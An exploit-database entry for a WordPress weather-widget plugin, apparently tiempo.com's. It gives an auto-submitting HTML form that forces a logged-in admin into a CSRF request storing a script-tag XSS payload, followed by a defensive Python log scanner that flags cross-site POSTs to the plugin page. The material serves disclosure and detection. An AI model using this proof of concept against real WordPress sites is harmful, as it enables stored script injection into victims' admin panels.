## https://sploitus.com/exploit?id=WPEX-ID:0E677DF9-2C49-42F0-A8E2-DBCF85BFC1A2
Make a logged-in admin open a page containing the code below:
```html
<html>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new" method="POST">
<input type="hidden" name="page" value="tiempocom/app/admin.php" />
<input type="hidden" name="title" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="language" value="en" />
<input type="hidden" name="continent" value="8" />
<input type="hidden" name="country" value="208" />
<input type="hidden" name="location" value="12325" />
<input type="hidden" name="location_label" value="Base Amundsen-Scott del Polo Sur" />
<input type="hidden" name="location_link" value="https://www.tiempo.com/base-amundsen-scott-del-polo-sur.htm" />
<input type="hidden" name="province_type" value="4" />
<input type="hidden" name="time" value="5" />
<input type="hidden" name="format" value="1" />
<input type="hidden" name="temperature_format" value="0" />
<input type="hidden" name="wind_format" value="0" />
<input type="hidden" name="rain_format" value="0" />
<input type="hidden" name="style" value="1" />
<input type="hidden" name="marquee" value="#000000" />
<input type="hidden" name="background" value="#FFFFFF" />
<input type="hidden" name="text" value="#808080" />
<input type="hidden" name="max" value="#FF0000" />
<input type="hidden" name="min" value="#0000FF" />
<input type="hidden" name="font" value="1" />
<input type="hidden" name="save" value="Save" />
<input type="hidden" name="action" value="-1" />
<input type="hidden" name="paged" value="1" />
<input type="hidden" name="action2" value="-1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
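For defenders, an added example that is not part of the original advisory: a Python check over web-server access logs in combined log format that flags POSTs to the plugin admin page used in the form above when the Referer is missing or points at another host, which is what an auto-submitted cross-site form produces. The site hostname and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: hostname of the protected site (the PoC targets example.com).
SITE_HOST = "example.com"
# Plugin admin page, taken from the PoC form's action URL.
PLUGIN_PAGE = "tiempocom/app/admin.php"

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def suspicious_csrf_posts(lines, site_host=SITE_HOST):
    """Return (timestamp, ip, referer) for POSTs to the plugin admin page
    whose Referer is missing or names a different host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        target = urlsplit(m["target"])
        if not target.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes, so tiempocom%2Fapp%2Fadmin.php matches.
        if PLUGIN_PAGE not in parse_qs(target.query).get("page", []):
            continue
        # hostname is None for "-" or an empty Referer; a privacy setting can
        # also strip it, so treat hits as leads to review, not as verdicts.
        ref_host = urlsplit(m["referer"]).hostname
        if ref_host != site_host.lower():
            hits.append((m["ts"], m["ip"], m["referer"]))
    return hits

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Mar/2024:10:01:02 +0000] "POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new HTTP/1.1" 302 - "https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Mar/2024:10:07:41 +0000] "POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new HTTP/1.1" 302 - "https://other-site.invalid/lure.html" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Mar/2024:10:09:13 +0000] "GET /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1" 200 5120 "https://other-site.invalid/lure.html" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Mar/2024:10:11:30 +0000] "POST /wp-admin/admin.php?page=tiempocom/app/admin.php&action=new HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ts, ip, referer in suspicious_csrf_posts(SAMPLE_LOG):
        print(f"{ts} {ip} POST to {PLUGIN_PAGE} with Referer {referer!r}")
```

Access logs do not record POST bodies, so this surfaces the cross-site submission only; confirming an injected `title` value requires inspecting the plugin's stored widget entries.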